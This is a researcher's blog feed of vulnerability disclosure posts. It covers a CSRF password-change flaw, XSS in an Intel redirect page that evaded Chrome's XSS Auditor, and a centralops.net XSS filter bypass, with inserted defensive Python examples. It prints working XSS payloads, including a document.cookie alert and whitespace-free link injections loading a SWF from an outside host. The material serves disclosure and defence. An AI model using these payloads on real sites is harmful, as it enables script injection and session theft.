<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Content-Length: 13877</span></div>
</td></tr>
</tbody></table>
</div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Because nothing in this request ties it to the page that generated it, an attacker only has to lure a logged-in user to a page carrying a CSRF exploit; the victim's browser then sends this HTTP POST with the session cookie attached, and the attacker can change the end user's password.</span></div>
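The following is an added example, not code from the original post or from Fry's: a minimal server-side handler showing the pattern described above (session cookie is the only check) next to the two checks that stop it, an Origin/Referer test and a per-session token compared in constant time. The endpoint name, the site origin https://shop.example and the session layout are assumptions; the forged request is constructed here.

```python
"""Added example (not Fry's code): a password-change handler with and
without CSRF protection. Hypothetical endpoint /account/change-password,
hypothetical site origin https://shop.example."""
import hmac
import secrets
from urllib.parse import urlencode, parse_qs

SITE_ORIGIN = "https://shop.example"  # assumption: the application's own origin


def new_csrf_token() -> str:
    """Unpredictable per-session token; stored server-side and echoed in forms."""
    return secrets.token_urlsafe(32)


def is_trusted_origin(headers: dict) -> bool:
    """Browsers attach Origin to cross-site POSTs, so a form auto-submitted
    from attacker.example fails here before the body is even parsed.
    Fall back to Referer only when Origin is absent."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == SITE_ORIGIN
    return headers.get("Referer", "").startswith(SITE_ORIGIN + "/")


def vulnerable_change_password(session: dict, headers: dict, body: str) -> tuple:
    """The pattern the post describes: only 'is there a logged-in session?'
    is checked, so any site that can make the victim's browser POST wins."""
    if "user" not in session:
        return 401, "not logged in"
    form = {k: v[0] for k, v in parse_qs(body).items()}
    session["password"] = form.get("new_password", "")
    return 200, "password changed"


def change_password(session: dict, headers: dict, body: str) -> tuple:
    """Hardened handler: same-origin check, then a CSRF token that must
    match the one stored in the server-side session."""
    if "user" not in session:
        return 401, "not logged in"
    if not is_trusted_origin(headers):
        return 403, "cross-site request rejected"
    form = {k: v[0] for k, v in parse_qs(body).items()}
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so token validity cannot be timed.
    if not hmac.compare_digest(submitted.encode(), session["csrf_token"].encode()):
        return 403, "missing or invalid CSRF token"
    new_pw = form.get("new_password", "")
    if len(new_pw) < 12:
        return 400, "password too short"
    session["password"] = new_pw
    return 200, "password changed"


def demo() -> tuple:
    """Replay one constructed cross-site POST against both handlers, then a
    legitimate same-origin submission. Returns the three status codes."""
    session = {"user": "victim", "csrf_token": new_csrf_token(), "password": "old"}
    # What attacker.example's auto-submitting form produces; the browser sets Origin.
    forged_headers = {"Origin": "https://attacker.example", "Cookie": "JSESSIONID=victim-session"}
    forged_body = urlencode({"new_password": "attacker-chosen-pw"})
    weak = vulnerable_change_password(session, forged_headers, forged_body)
    hardened = change_password(session, forged_headers, forged_body)
    # Legitimate submission from the site's own form, carrying the session's token.
    good_headers = {"Origin": SITE_ORIGIN}
    good_body = urlencode({"csrf_token": session["csrf_token"],
                           "new_password": "correct horse battery"})
    legit = change_password(session, good_headers, good_body)
    return weak[0], hardened[0], legit[0]


if __name__ == "__main__":
    print(demo())  # (200, 403, 200)
```

The Origin check alone would already have stopped the forged request; the token is kept because older browsers and some proxy setups strip Origin and Referer, and a missing header should fail closed rather than open.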
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b>Disclosure:</b></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Frys was contacted via Twitter and LinkedIn, as no direct security contact information was available. No response was received, so the details have been released.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgairfrxVqq5kEOTZnrrui_aXrZr7XM-YxEAmXsdLKIr44v5CRzVVf00UImC_bZyos_Sq7f0EFIqKpG8NFYlhnoDJBvXbDNCbsvCg0xVAwIDBnLFM2fX0eIrzsP2MCy6ym2Oy33Xw/s1600/Screen+Shot+2017-10-04+at+10.19.25+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="262" data-original-width="1192" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgairfrxVqq5kEOTZnrrui_aXrZr7XM-YxEAmXsdLKIr44v5CRzVVf00UImC_bZyos_Sq7f0EFIqKpG8NFYlhnoDJBvXbDNCbsvCg0xVAwIDBnLFM2fX0eIrzsP2MCy6ym2Oy33Xw/s640/Screen+Shot+2017-10-04+at+10.19.25+AM.png" width="640" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-81874851002098199702015-03-07T10:48:00.002-08:002015-03-07T10:48:27.334-08:00TCPExtract (or TCPxtract) Installation Discrepancies on Mac - Step-by-Step !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEislCBEyzAwqY7bvauE3Ee6BxMb9u8TH1oVrKbagCl1sFMla2qW_OILFaAc3IR1bwgp0LDxlQYniUYqdHv3swoDjryhTlBgGqKe1fmhmMW8XjEqzWKuGggceJjw_n9k0dKfaz3K3g/s1600/6FgH3zpA.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEislCBEyzAwqY7bvauE3Ee6BxMb9u8TH1oVrKbagCl1sFMla2qW_OILFaAc3IR1bwgp0LDxlQYniUYqdHv3swoDjryhTlBgGqKe1fmhmMW8XjEqzWKuGggceJjw_n9k0dKfaz3K3g/s1600/6FgH3zpA.png" height="200" width="200" /></a></div>
TCPExtract (or TCPxtract) extracts files from PCAPs by reassembling TCP sessions and carving objects out of them by file signature. It is useful during object extraction or file analysis of network traffic. Installing it on a Mac is tricky: several issues need to be debugged before it builds properly. I spent some time getting it installed and wanted to share the complete solution. The installation steps are discussed below:<br />
<br />
My Mac is configured with brew (you can repeat the same steps with ports also).<br />
<br />
1. Install libnet: <b>brew install libnet</b><br />
2. Install libnids: <b>brew install libnids</b><br />
3. Install pynids: <b>wget <a href="https://jon.oberheide.org/pynids/downloads/pynids-0.6.1.tar.gz">https://jon.oberheide.org/pynids/downloads/pynids-0.6.1.tar.gz</a> --no-check-certificate</b><br />
<ul>
<li><b>ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future python setup.py build (Clang issue due to updates by Apple related to XCode : <a href="https://langui.sh/2014/03/10/wunused-command-line-argument-hard-error-in-future-is-a-harsh-mistress/">https://langui.sh/2014/03/10/wunused-command-line-argument-hard-error-in-future-is-a-harsh-mistress/</a>)</b></li>
<li><b>sudo ARCHFLAGS=-Wno-error=unused-command-line-argument-hard-error-in-future python setup.py install</b></li>
</ul>
4. Download tcpxtract from SourceForge: http://tcpxtract.sourceforge.net/<br />
<ul>
<li>extract the tcpxtract files into a folder using <b>tar xvf tcpxtract.tar.xz</b> (tar detects the compression; the <b>z</b> flag is for gzip archives)</li>
<li>./configure</li>
<li>Before running make, if the link step fails because libfl cannot be found, try one of the following:</li>
</ul>
<ul><ul>
<li>cd /usr/lib and<b> sudo ln -s libl.a libfl.a (Flex issue: the flex runtime library needs to be linked under its expected name - <a href="http://www.linuxfromscratch.org/lfs/view/6.4/chapter06/flex.html">http://www.linuxfromscratch.org/lfs/view/6.4/chapter06/flex.html</a>)</b></li>
<li>or link by hand, adding the <b>-lfl</b> flag after the object files:<b> gcc -D_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -g -O2 -o tcpxtract tcpxtract.o sessionlist.o util.o confy.o confl.o conf.o search.o extract.o -lpcap -lfl</b></li>
</ul>
</ul>
<ul>
<li>make</li>
<li>sudo make install</li>
</ul>
How it goes:<br />
<br />
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>$ ./tcpxtract -f ~/malware_pcaps_repository/botnet_cc_pcaps/Keylogger_Limlspy.A.pcap -o dump/</i></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>Found file of type "html" in session [50.116.98.95:20480 -> 172.31.2.41:14528], exporting to dump/00000001.html</i></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>Found file of type "png" in session [50.116.98.95:20480 -> 172.31.2.41:14528], exporting to dump/00000002.png</i></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>Found file of type "html" in session [50.116.98.95:20480 -> 172.31.2.41:14272], exporting to dump/00000003.html</i></div>
<div style="background-color: white; color: #222222; font-family: arial, sans-serif; font-size: 12.8000001907349px;">
<i>Found file of type "png" in session [50.116.98.95:20480 -> 172.31.2.41:14272], exporting to dump/00000004.png</i></div>
<br />
You can also look at extending TCPxtract from Python:<br />
<br />
1.<b> <a href="http://nullege.com/codes/search/TcpExtract.FileExtractor">http://nullege.com/codes/search/TcpExtract.FileExtractor</a></b><br />
2. Another solution :<b> <a href="http://computer.forensikblog.de/en/2005/10/tcpxtract-version-10.html">http://computer.forensikblog.de/en/2005/10/tcpxtract-version-10.html</a></b><div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com2tag:blogger.com,1999:blog-30098758.post-16669545958958344302014-08-08T09:41:00.000-07:002014-08-08T09:41:27.773-07:00C-SCAD Tool Presentation and Tool AvailableThe project page of C-SCAD tool has been updated. Please check the details here: <a href="http://cscad.secniche.org/"><b>http://cscad.secniche.org</b></a><br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/37806634" style="border-width: 1px; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="427"> </iframe> <div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/adityaks/blackhat-arsenal-2014-cscad" target="_blank" title="BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Client (Penetration Testing)">BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Client (Penetration Testing)</a> </strong> from <strong><a href="http://www.slideshare.net/adityaks" target="_blank">Aditya K Sood</a></strong> </div>
</center>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-43785098631525862762014-02-16T16:05:00.000-08:002014-02-16T16:05:20.575-08:00Intel XSS and Google Chrome XSS Auditor Bypass : Application Design Matters! Its True !<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Last time, I talked about the role of application design in impacting the state of client-side XSS filters. You can read that blog post here: <a href="http://zeroknock.blogspot.com/2013/12/web-application-design-does-matter.html"><b><i>http://zeroknock.blogspot.com/2013/12/web-application-design-does-matter.html</i></b></a>. While following up on that hypothesis, another case study came to my notice. I reported a Cross-site Scripting (XSS) bug in the Intel retailer website, and the Intel security team removed the vulnerable web page from its Internet-facing environment. <b>Responsible disclosure is the way to go.</b><br />
<br />
<b>What's the lesson here? </b>XSS vulnerabilities are nothing new; the interesting part is how the vulnerable application affects browser-side security components such as XSS filters. In this case study, the Google Chrome XSS Auditor (enabled by default) again fails to do the job it is designed for.<br />
<br />
The point is not that an Intel website had an XSS bug, but that whether an XSS payload executes depends on the application design, and there is always some unexpected behavior: even sophisticated client-side XSS filters can be bypassed easily. I have not had time to investigate what caused this payload to slip past Chrome's XSS Auditor; I will notify the Google Chrome team so that they can take a look at it.<br />
<br />
<b>Proof-of-Concept:</b> I used a very simple payload, <i>JavaScript:alert(document.cookie)</i>, in the "URL" parameter of the vulnerable redirect.asp page.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvTNsjuz7pzCQOad4KCWP3d74BXPOUPpQpOU6zt06iiH5wqQAspwGr6jy1zt9QpitR4k6V6j7uej-sGBKXGP0_Xuw24c9cDJJnXOURlgGXLPw9GdC23dwJkTjZUemhIr4FHFEg0Q/s1600/google_chrome_bypass2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvTNsjuz7pzCQOad4KCWP3d74BXPOUPpQpOU6zt06iiH5wqQAspwGr6jy1zt9QpitR4k6V6j7uej-sGBKXGP0_Xuw24c9cDJJnXOURlgGXLPw9GdC23dwJkTjZUemhIr4FHFEg0Q/s1600/google_chrome_bypass2.png" height="363" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Injected XSS Payload !<br /><div style="text-align: left;">
<br /></div>
</b></td></tr>
</tbody></table>
<div>
The payload is embedded in the page as a hyperlink, i.e. a javascript: URL in an href, and the XSS Auditor let it render. Clicking the link executed the script, so the XSS injection worked and the cookie was extracted.</div>
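The following is an added example and not Intel's code: why a redirect page that copies its "URL" parameter straight into an href is exploitable with a javascript: URL, and the scheme allowlist that closes it. The page layout, the function names and the site origin https://example.com/ are assumptions; the payload list is constructed here and includes variants (leading tab, embedded newline) that browsers tolerate but a naive string check would miss.

```python
"""Added example (not Intel's code): a redirect link built from a user
supplied URL, vulnerable and hardened. SITE and the page markup are
assumptions made for the example."""
import html
from urllib.parse import urlsplit, urljoin

SITE = "https://example.com/"  # assumption: the application's own origin


def vulnerable_redirect_page(url_param: str) -> str:
    """The pattern described above: the parameter becomes the href verbatim,
    so a javascript: URL runs in the page's origin when the link is clicked."""
    return f'<a href="{url_param}">Continue to your destination</a>'


def safe_redirect_target(url_param: str) -> str:
    """Return an http(s) URL or raise ValueError.

    Browsers ignore leading/trailing whitespace and embedded tab/newline
    characters in a URL and compare schemes case-insensitively, so the
    value is normalised the same way before the scheme is examined.
    Scheme-less values (relative paths) are resolved against SITE so the
    result can only ever be http or https."""
    cleaned = "".join(ch for ch in url_param.strip() if ch not in "\t\r\n")
    parts = urlsplit(cleaned)
    if parts.scheme == "":
        cleaned = urljoin(SITE, cleaned)
        parts = urlsplit(cleaned)
    if parts.scheme.lower() not in ("http", "https"):
        raise ValueError(f"refusing scheme {parts.scheme!r}")
    return cleaned


def hardened_redirect_page(url_param: str) -> str:
    """Validate first, then escape the value as an attribute so it cannot
    break out of the href quotes either."""
    try:
        target = safe_redirect_target(url_param)
    except ValueError:
        target = SITE  # fall back to the home page rather than echoing the input
    return f'<a href="{html.escape(target, quote=True)}">Continue to your destination</a>'


# Constructed inputs: the post's payload, two browser-tolerated variants,
# and two legitimate destinations.
PAYLOADS = [
    "JavaScript:alert(document.cookie)",
    "\tjavascript:alert(1)",
    "java\nscript:alert(1)",
    "https://partner.example/page",
    "/store/checkout",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(hardened_redirect_page(p))
```

A denylist of the string "javascript:" would have rejected the first payload and passed the other two; checking the parsed scheme against an allowlist after normalisation is what makes the difference.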
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBGJCR9aen9FGufJVkVMrzC_eOBB6vqRmpMUV-X9vSo6ad8OhUfrAqYilqRVgd5S4yBPA1sdVqRfsxib8hS3X3B3F6hl0nBAfFoc8XXYxZjPGavUFaak0u2mh6reyEFjv4J7egxQ/s1600/google_chrome_bypass3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBGJCR9aen9FGufJVkVMrzC_eOBB6vqRmpMUV-X9vSo6ad8OhUfrAqYilqRVgd5S4yBPA1sdVqRfsxib8hS3X3B3F6hl0nBAfFoc8XXYxZjPGavUFaak0u2mh6reyEFjv4J7egxQ/s1600/google_chrome_bypass3.png" height="374" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Successful XSS Injection !</b></td></tr>
</tbody></table>
<div>
Keep on trying !<br /></div>
<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-70551405526836035202014-01-07T18:42:00.000-08:002014-01-07T19:50:55.233-08:00Code Nuances (or Bypassing XSS Filters) : Centralops.net Case StudyIt is always fun to play around with deployed security mechanisms that are meant to stop application-layer attacks. It is much more interesting to target applications that have protections (or that throw up code nuances) than to attack protection-free applications. A simple case study of centralops.net is presented below.<br />
<br />
<b>Acknowledgement: </b>I would like to thank Gavin from Hexillion Group (<a href="http://hexillion.com/">http://hexillion.com/</a>) for patching this issue within few hours.<br />
<br />
<b>Case Study:</b> While recently using the Domain Dossier tool on centralops.net (<a href="http://www.centralops.net/">http://www.centralops.net</a>) for my ongoing research, I came across an interesting scenario where I had to work around some glitches in the code (or filter) to get XSS to execute. I wanted to perform link injection with the payload:<br />
<blockquote class="tr_bq">
"/>&<a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a></blockquote>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGvMczZb5gAyTBFSfJLNFrXRS5IEczFVSYa1naX93bWBJ6QSxIl8xSfg7cjy35Mh5emmDjTdexj7mMgIfusBuhESjbXWZsR-5g_Q_5bvYkOJ_SOQjIMaHDetweWZOsoP3tEaZSig/s1600/centralops_xss_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGvMczZb5gAyTBFSfJLNFrXRS5IEczFVSYa1naX93bWBJ6QSxIl8xSfg7cjy35Mh5emmDjTdexj7mMgIfusBuhESjbXWZsR-5g_Q_5bvYkOJ_SOQjIMaHDetweWZOsoP3tEaZSig/s400/centralops_xss_1.png" height="180" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Error due to Injection !</b></td></tr>
</tbody></table>
<br />
The error I encountered was: <i><b>"has multiple items separated by spaces, but only one input is allowed at a time. Domain Dossier will continue with"</b></i><br />
<br />
The error clearly indicates that the input has to be provided as a single value, so the injection payload has to be pushed as one value. I tried a number of payloads with different meta characters that produced the same response, until I found an XSS payload that bypassed everything in this scenario. <i>I played around with the whitespace and replaced it with certain characters that still let the JavaScript execute (one can find more payloads, but given the time I was satisfied with this, because the bypass was already done). Overall it was about ten minutes of play.</i><br />
<br />
<blockquote class="tr_bq">
Original : "/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a><br />
Bypass:<b> "/><a//href="http:</b>//0x.lv/xss.swf"><b>Injecting_SWF_Payload</b></a><br />
Bypass: <b>"/><a/href="http:/</b>/0x.lv/xss.swf"><b>Injecting_SWF_Payload</b></a> </blockquote>
<b>Note:</b> I used the <b>"/", "//" and "_"</b> characters so that the payload contains no whitespace and is treated as one value, then submitted it. The injection then occurs as follows: <br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPSbMUZ8gqAIkVhOiSeVvb2wxlts-VzVgHfh8z1mD0rSujXQVd-0DVv9sQPKRWNGVQq3qx0EoSMR6_clP-8m2h_rgJM8WeRMpycMoFGFrL2YcLbci24beExLu0mW1n1SVJbedxHQ/s1600/centralops_xss_2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPSbMUZ8gqAIkVhOiSeVvb2wxlts-VzVgHfh8z1mD0rSujXQVd-0DVv9sQPKRWNGVQq3qx0EoSMR6_clP-8m2h_rgJM8WeRMpycMoFGFrL2YcLbci24beExLu0mW1n1SVJbedxHQ/s400/centralops_xss_2.png" height="166" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Successful Rendering of XSS Payload !</b></td></tr>
</tbody></table>
The supplied payload resulted in successful XSS injection in the target application.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAcJv2YLYrd0AddHf33OAQGkcXtP9SOYqOTNNjHRaBzDslQq01QSkPmikVIXnNtXn5vIOv9tQiktepxgGa0nEWyhLU5HvSDR92nGoz9JAVMNFp3a0ftJhjEzlwF7RFJ5VYeY8twg/s1600/centralops_xss_3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAcJv2YLYrd0AddHf33OAQGkcXtP9SOYqOTNNjHRaBzDslQq01QSkPmikVIXnNtXn5vIOv9tQiktepxgGa0nEWyhLU5HvSDR92nGoz9JAVMNFp3a0ftJhjEzlwF7RFJ5VYeY8twg/s400/centralops_xss_3.png" height="185" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>Successful Execution of Payload !</b></td></tr>
</tbody></table>
<br />
<b>What do we learn from this?</b><br />
Over the past years I have come to feel that it is more important to understand exactly how an attack is executed (by analyzing the underlying components). In my experience, one attack vector will not work in every target environment, so we have to build a new one each time.<b> In a number of earlier scenarios, I have seen that tampering with the whitespace between HTML attributes and tags makes the code fail to render properly in the application. In this case study, however, we are required to embed additional characters in the payload precisely so that it is passed to the application as one value.</b><br />
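The mismatch the bypass relies on can be reproduced with Python's HTML tokenizer. This is an added example, not centralops.net's code: the one-value filter is a hypothetical stand-in for the "only one input is allowed at a time" check quoted above, and the page fragment the payload lands in is constructed. What it shows is that the filter and the browser disagree about what separates a tag name from its attributes: the filter looks for whitespace, while the HTML parser also accepts "/".

```python
"""Added example (not centralops.net's code): a whitespace-rejecting input
filter versus the HTML parser's tolerance for '/' between tag name and
attributes. The filter and the rendered fragment are assumptions."""
from html.parser import HTMLParser


def one_value_filter(value: str) -> bool:
    """Stand-in for the 'only one input is allowed' check: accept the
    value only if it contains no whitespace at all."""
    return not any(ch.isspace() for ch in value)


class LinkCollector(HTMLParser):
    """Record every <a> start tag and its attributes as the parser sees them."""
    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.links.append(dict(attrs))


def links_in(fragment: str) -> list:
    parser = LinkCollector()
    parser.feed(fragment)
    parser.close()
    return parser.links


def render(value: str) -> str:
    """The injection point: the submitted value echoed, unescaped, into a
    quoted attribute of the domain input box."""
    return f'<input type="text" name="domain" value="{value}" />'


# The three payloads from the post.
ORIGINAL = '"/><a href="http://0x.lv/xss.swf"> Injecting SWF Payload </a>'
BYPASS_DOUBLE_SLASH = '"/><a//href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>'
BYPASS_SINGLE_SLASH = '"/><a/href="http://0x.lv/xss.swf">Injecting_SWF_Payload</a>'


def outcome(payload: str) -> tuple:
    """(passed the filter?, hrefs of the <a> tags the parser extracts from
    the rendered page). A payload that fails the filter never renders."""
    if not one_value_filter(payload):
        return False, []
    return True, [a.get("href") for a in links_in(render(payload))]


if __name__ == "__main__":
    for name, p in [("original", ORIGINAL), ("bypass //", BYPASS_DOUBLE_SLASH),
                    ("bypass /", BYPASS_SINGLE_SLASH)]:
        print(f"{name:10s} {outcome(p)}")
```

The fix on the application side is not a better whitespace rule but HTML-escaping the value when it is written into the attribute; the filter's notion of "one value" is simply not the parser's.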
<br />
<b>Inference: </b><br />
<b><br /></b>
<b>(1) Understand the error and develop appropriate combinations to overcome nuances (or bypass XSS filters).</b><br />
<b>(2) Design XSS payload as per target environment.</b><br />
<br />
Enjoy !<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-19595991649164014352014-01-01T11:45:00.000-08:002014-01-02T11:36:31.568-08:00Reported Jenkins Vulnerability Patched by BlackBerry !<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWGmozMzQY81jIvg-i00nWVd5qg7JKRusSqVlzyfZbDAzf0FWC3u6IixhbnPewBHw9vOHxBGTua2Z7uqCsxQsRzRHrZNxPLF4U7IqwN8U-wQyLRYhlM2xRHYy6-RKgIQCG1nq6Aw/s1600/Blackberry_fruit.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWGmozMzQY81jIvg-i00nWVd5qg7JKRusSqVlzyfZbDAzf0FWC3u6IixhbnPewBHw9vOHxBGTua2Z7uqCsxQsRzRHrZNxPLF4U7IqwN8U-wQyLRYhlM2xRHYy6-RKgIQCG1nq6Aw/s200/Blackberry_fruit.jpg" width="143" /></a></div>
A couple of months ago, I discussed the existence of configuration flaws in deployments of the Jenkins software management application. The details are presented here: <a href="http://zeroknock.blogspot.com/2013/08/protect-your-software-development-web.html"><b>Jenkins Configuration Issues</b>.</a> Using the same benchmark, I reported a few vulnerabilities in BlackBerry's infrastructure. Recently, I found that they added my name to their responsible disclosure list: <a href="http://ca.blackberry.com/business/topics/security/incident-response-team/collaborations.html"><b>BlackBerry Responsible Disclosure List!</b></a>, which is fine as long as the team eradicates the vulnerability.<br />
<br />
Nowadays, I do not perform aggressive vulnerability hunting (due to my day job), but when I have time I dissect components of widely used software and try to find flaws in them. I am more interested in cases where companies understand the problem and are ready to patch it, and not at all inclined towards finding generic issues in websites that nobody cares about. <i>I always believe that it is important to understand the consequences of a vulnerability when it is reported. It is also crucial to determine how an attacker could chain together a set of bugs for greater impact. If we don't understand the nitty-gritty details of a vulnerability, there is a high chance that it will resurface.</i><br />
<br />
In BlackBerry's case, the unnecessary exposure of a Jenkins component in a production environment could have resulted in problematic scenarios: the exposed Jenkins components were vulnerable to flaws such as injections, XSS, etc. So the belief is: <b>"Expose Less and Be Secure !"</b><br />
<br />
<b>Note</b>: I am going to reveal Frame Injection vulnerability to Jenkins team so that the issue can be patched. No details for now.<br />
<br />
Enjoy !<div class="blogger-post-footer">[0kn0ck's Blog]</div>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.com0tag:blogger.com,1999:blog-30098758.post-87806657644750384932013-12-29T08:09:00.000-08:002014-03-06T06:14:56.802-08:00Web Application Design Does Matter - Google Chrome XSS Auditor Bypass : Version <= 32.0.1700.41 m Aura !<b>Update (6th March 2014) : </b>The post is also discussed on Stack Overflow here: <a href="https://stackoverflow.com/questions/22202323/bypass-the-chrome-xss-auditor-by-changing-attributes-in-forms" style="font-weight: bold;">https://stackoverflow.com/questions/22202323/bypass-the-chrome-xss-auditor-by-changing-attributes-in-forms</a>, for additional discussion by the users.<br />
<b><br /></b>
